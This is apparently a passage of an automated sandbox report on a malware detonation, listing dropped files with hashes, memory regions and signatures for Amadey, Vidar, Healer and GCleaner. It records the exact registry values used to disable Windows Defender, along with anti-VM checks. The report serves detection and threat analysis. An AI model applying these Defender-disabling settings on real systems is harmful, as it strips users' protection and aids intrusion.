| SHA256 | a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6 |
| SHA512 | 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb |
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
| MD5 | 896dc9ae02a4b0cf429b4346a3990fae |
| SHA1 | 17f297bb4cf3acd07078fc5d73c1d6564a8c0710 |
| SHA256 | 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2 |
| SHA512 | e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c |
memory/1452-59-0x0000000000EE0000-0x0000000000F90000-memory.dmp
memory/1748-75-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-73-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-72-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1748-70-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-68-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-66-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-64-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-62-0x0000000000400000-0x000000000045F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
| MD5 | 87da0483aefde76a5086c5b2ea14304f |
| SHA1 | ae6b27aeaf487666c71b26397709004e65b09002 |
| SHA256 | 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f |
| SHA512 | ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4 |
memory/2680-90-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2876-94-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2680-93-0x0000000006710000-0x0000000006B7A000-memory.dmp
memory/1472-102-0x000000013F730000-0x000000013FBEB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabCB0.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarD20.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0dadbeb6cb656c1adadb2015c5727321 |
| SHA1 | 7bdb83d1c1dbbe875804d6ec90d87fc205638c16 |
| SHA256 | 323066e5228b20f9be99a08a9d14695423f8b12198ef49ff4bd537988e98c9ce |
| SHA512 | 067cf6d24c40d0775e11c3fc0d9e8819d6dc63f92362fbbd82ec4dc25f38b92f2891da5c3811931821ae4937f4df290f16e4f1b3dd37145b75e6d2e9d4dfac41 |
C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
| MD5 | 5b0bf9144e2661027c1621957b1ef278 |
| SHA1 | 589efc0736ecc18d94e4dd8d353502e8d76738c4 |
| SHA256 | a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f |
| SHA512 | e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177 |
C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta
| MD5 | ae563590dd5b65fb84045428b3c11628 |
| SHA1 | 5690c743b714148b4017ea721dad61b654976dce |
| SHA256 | 0ef0e06906218a3cbe624c964e5fd67bf277e3d3ee6cf291af5db22ceada9d88 |
| SHA512 | 2186ad4b4bbc1f9180139d38f9d89369561e7bc867359d424a0984ac7683ce86ab30d5dfd2697f6249988b102358e769f41e275bb8b1917d845a4e5b7294827a |
C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE
| MD5 | 03a574d64f0e62c5e117a5f5acf137e4 |
| SHA1 | 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90 |
| SHA256 | dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747 |
| SHA512 | d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1 |
memory/1452-277-0x0000000001270000-0x00000000016C2000-memory.dmp
memory/2680-276-0x0000000006710000-0x0000000006B7A000-memory.dmp
memory/2876-274-0x0000000000400000-0x000000000086A000-memory.dmp
memory/1672-273-0x0000000006440000-0x0000000006892000-memory.dmp
memory/1672-272-0x0000000006440000-0x0000000006892000-memory.dmp
memory/1452-296-0x0000000001270000-0x00000000016C2000-memory.dmp
memory/1452-297-0x0000000001270000-0x00000000016C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 9b007a287efa6b3a81140630ab982f57 |
| SHA1 | 5d25771df48e4f684da495be34f9f4397cc1b262 |
| SHA256 | 6003b304cea7770b10db506f07194eacfa3a0a794df79bc42af91cacca68c02c |
| SHA512 | 3e97c17b2661d1b9476bb0b195e6773c68f13564e952f6758cbf8078160fdf31b0d8ea04f8465ad4c8475819e6f50a054178d07ce2d18482c8422a232511ded8 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Temp\My6dz0IVO.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
memory/2876-389-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2680-388-0x0000000000FE0000-0x00000000014B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
| MD5 | 41e7a544f14c8eeda7675b6f8fc2f267 |
| SHA1 | 98585d0462f44ace4216e00c0ae33f7b3606e0d4 |
| SHA256 | b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843 |
| SHA512 | 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef |
memory/2680-412-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/1368-415-0x0000000000DC0000-0x00000000010EE000-memory.dmp
memory/2680-413-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/1452-433-0x0000000001270000-0x00000000016C2000-memory.dmp
memory/1368-432-0x0000000000DC0000-0x00000000010EE000-memory.dmp
memory/1368-431-0x0000000006DF0000-0x000000000711E000-memory.dmp
memory/1228-437-0x0000000000EB0000-0x00000000011DE000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
memory/1652-477-0x0000000006660000-0x0000000006980000-memory.dmp
memory/2680-479-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/3124-478-0x0000000000E00000-0x0000000001120000-memory.dmp
\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
| MD5 | d433e1dc943e6ea29d67cf72d2f6fecd |
| SHA1 | 9964aa3e596d93673c4d84695dc94d6f1a9766cd |
| SHA256 | a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5 |
| SHA512 | caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43 |
memory/1652-476-0x0000000006660000-0x0000000006980000-memory.dmp
memory/3124-501-0x0000000000E00000-0x0000000001120000-memory.dmp
memory/2680-524-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/1452-537-0x0000000001270000-0x00000000016C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
| MD5 | 49a690607e1d76e6970b724c4fd22ec7 |
| SHA1 | 4b670fc77c181e9afb3986729ee3b585bc460c3f |
| SHA256 | 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7 |
| SHA512 | 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b |
memory/2680-584-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/1228-586-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/3780-589-0x00000000013C0000-0x00000000016BF000-memory.dmp
memory/2680-588-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-587-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/2876-611-0x0000000000400000-0x000000000086A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | bd6a9d5ffd2bad77a792a14ab8f2775f |
| SHA1 | 9494a453e67cce126bbad031b33325e17deaf374 |
| SHA256 | f610afd2849e89b2b04d2bdca5b33211be65081e94a5207cc51e4e0cb1c0d498 |
| SHA512 | 6cd104bf357c61374dde38dce2664a8101b051a9ba47379b762290022a20bbfe00d4f99e2a1d685f81718305b3b6c63fd70d20d46bc1963b737fb6d1ed7efc42 |
C:\Users\Admin\AppData\Local\Temp\1091742001\b0c35556ec.exe
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | 9d6f03d5a83f9ab0de52c69257720122 |
| SHA1 | 407ce825de553f856059543cb20c2002f4b2b87d |
| SHA256 | ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6 |
| SHA512 | d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db |
memory/1228-652-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1228-654-0x0000000006E30000-0x0000000007290000-memory.dmp
memory/1188-656-0x0000000000400000-0x0000000000860000-memory.dmp
memory/1228-653-0x0000000006E30000-0x0000000007290000-memory.dmp
memory/3780-670-0x00000000013C0000-0x00000000016BF000-memory.dmp
memory/2680-702-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/2680-721-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/2680-722-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2876-723-0x0000000000400000-0x000000000086A000-memory.dmp
memory/1228-724-0x0000000006E30000-0x0000000007290000-memory.dmp
memory/1228-725-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-727-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-730-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | 738b0ee088c4454612ca08bd68ff3db8 |
| SHA1 | af6ed558fc5daebccb1e4fa96cbaab2867ed8920 |
| SHA256 | caf2043f1d8c51b1c2a16dc58552bb6e73a8794d0d24b0389716313ae52c12b0 |
| SHA512 | 50f608b38e8975d97dfc389d297a9615beada8fd2a43f7a9053d9f142dd292fef49f873d44b51952deea566b2f05fb8d69b5557c150f45af5e18ca2f583d53b5 |
C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe
| MD5 | cf6bd1302ab35c1275fedadbabde12fa |
| SHA1 | 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1 |
| SHA256 | 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7 |
| SHA512 | c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04 |
memory/2680-764-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2876-783-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2876-805-0x0000000000400000-0x000000000086A000-memory.dmp
memory/1228-806-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-807-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-808-0x0000000000400000-0x0000000000860000-memory.dmp
memory/1644-809-0x0000000000910000-0x0000000001554000-memory.dmp
memory/2444-810-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2444-812-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1644-811-0x0000000000910000-0x0000000001554000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe
| MD5 | 639af76cb7333cbd609da5d52a6e195b |
| SHA1 | a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483 |
| SHA256 | a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8 |
| SHA512 | 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51 |
memory/2680-826-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2444-830-0x0000000010000000-0x000000001001C000-memory.dmp
memory/1228-834-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-836-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-837-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe
| MD5 | 75dd7a91559a030b7c608e32474413d0 |
| SHA1 | a2f27e1caa02eda2e33577e530b9538b31ac6626 |
| SHA256 | d4ad9f72eb0ec01c9b73ad3a798c19496d639ab67dc963acf1cfc8e59b869f95 |
| SHA512 | a98b44e762d26050be8cd11fd2bc7609f8ac5cadf36bdb49b3c205ed30b1dfc2c77a59da6472a06766d629db0c283728bad6ff8a6d24a3c5dda6ba5b0888fdc5 |
memory/3492-855-0x0000000000360000-0x0000000000D98000-memory.dmp
memory/2680-854-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/624-858-0x0000000000400000-0x000000000042F000-memory.dmp
memory/3492-857-0x0000000000360000-0x0000000000D98000-memory.dmp
memory/2908-860-0x0000000000AA0000-0x0000000000DA8000-memory.dmp
memory/1228-863-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-864-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-871-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2680-877-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/1228-881-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-882-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-884-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2680-894-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/1188-902-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe
| MD5 | db3632ef37d9e27dfa2fd76f320540ca |
| SHA1 | f894b26a6910e1eb53b1891c651754a2b28ddd86 |
| SHA256 | 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d |
| SHA512 | 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd |
C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe
| MD5 | f071beebff0bcff843395dc61a8d53c8 |
| SHA1 | 82444a2bba58b07cb8e74a28b4b0f715500749b2 |
| SHA256 | 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec |
| SHA512 | 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d |
memory/880-961-0x0000000001080000-0x0000000001130000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-24 13:24
Reported
2025-02-24 13:26
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
